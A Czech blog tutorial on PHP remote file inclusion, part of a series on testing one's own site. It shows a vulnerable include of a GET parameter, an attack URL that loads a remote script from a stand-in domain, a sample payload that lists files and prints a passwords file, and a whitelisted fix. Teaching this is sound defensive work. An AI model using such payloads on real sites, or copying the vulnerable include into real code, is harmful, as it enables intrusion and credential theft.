Hackerem sám sobě (1) - PHP Injection

Tento článek startuje menší seriál o bezpečnosti webových aplikací. Řeknu vám, jak hackovat své vlastní stránky za účelem důkladného otestování bezpečnosti vašeho webu. Tím vás ale nenabádám, abyste tyto techniky zkoušeli na stránkách, které nepatří vám - žádné skrývání pomocí sítě TOR a nabourávání webu FBI prosím nedělejte.

Všechny techniky se pokusím prakticky ukázat - to znamená, že uvidíte ukázky kódu a odkazy přímo na PHP skripty, kde lze tuto chybu pozorovat. V žádném případě nebudu zacházet až příliš do hloubky - další rozšiřování kódu je na vaší fantazii.

PHP Injection

Začnu tím nejjednodušším, kde dělají chyby většinou jen začátečníci. Spočívá v injection = injekci, tedy vložení cizího skriptu do stránky. Bezpečnostní riziko mohou způsobit funkce, které provádějí kód z externích souborů - nejčastěji include nebo require.

Nejvíce je s touto technikou spojován skript index.php, který obsahuje hlavičku a patičku, přičemž samotný obsah je tvořen externím souborem vkládaným přes include:

<html>
 <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Ukázka PHP Injection</title>
 </head>
 <body>
  <!-- hlavicka a menu -->
  <?php include $_GET[ "stranka" ] ?>   
  <!-- paticka -->
 </body>
</html>

Tímto tvůrce stránek udělal jednoduchý skript díky kterému nemusí psát do každého html souboru menu a další věci opakující se na každé stránce. Adresa stránky s kontaktem bude mít následující tvar:

index.php?stranka=kontakt.php

Je to sice krásně jednoduché, ale takový skript má obrovskou bezpečnostní díru ! Pokud nemáme na serveru zakázáno allow_url_include, můžeme směle kontakt.php nahradit vzdáleným skriptem:

index.php?stranka=http://domena.cz/zakernyskript.php

Tento vložený cizí skript pak bude mít stejné práva a možnosti jako váš vlastní skript ! Může třeba prohlížet obsah adresáře nebo zobrazit obsah jakéhokoliv vašeho skriptu:

<p><strong>Klidně si vypíšu obsah adresáře:</strong></p>
<p>
 <?php
 $adresar = dir( "./" );
 while ( $polozka = $adresar->read( ) ) {
  echo $polozka."<br />\\n";
 }
 $adresar->close( );
 ?>
</p>
<p><strong>A pak obsah souboru s hesly:</strong></p>
<pre>
 <?php
 echo htmlspecialchars( file_get_contents( "passwords.php" ) );
 ?>
</pre>

A je vymalováno - tato bezpečnostní díra přinesla útočníkovi celý web na stříbrném podnose.

Řešení

Nejlepší metodou pro tento typ skriptu je nadefinování všech stránek pomocí podmínek. Nebudeme tím spoléhat na vstup, což udělá náš skript bezpečným.

<html>
 <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Bezpečný skript</title>
 </head>
 <body>
  <!-- hlavicka a menu -->
  <?php
  switch ( $_GET[ "stranka" ] ) {
   case "novinky":
    include "novinky.php";
    break;
   case "kontakt":
    include "kontakt.php";
    break;
   // a tak dale...
   default:
    include "404.php"; // stranka nenalezena	
    break;
  }
  ?>
  <!-- paticka -->
 </body>
</html>

Adresa pro zobrazení kontaktu bude nyní index.php?stranka=kontakt.

Doufám, že jste si uvědomili nedozírné následky prezentované chyby a dáte si na PHP Injection pozor. Pokud používáte externí soubory, ujistěte se, že opravdu nejdou podstřčit něčím jiným. Dávejte si pozor i na přípony, existují situace, kdy i obrázek může být maskovaný skript 😉.

comments powered by Disqus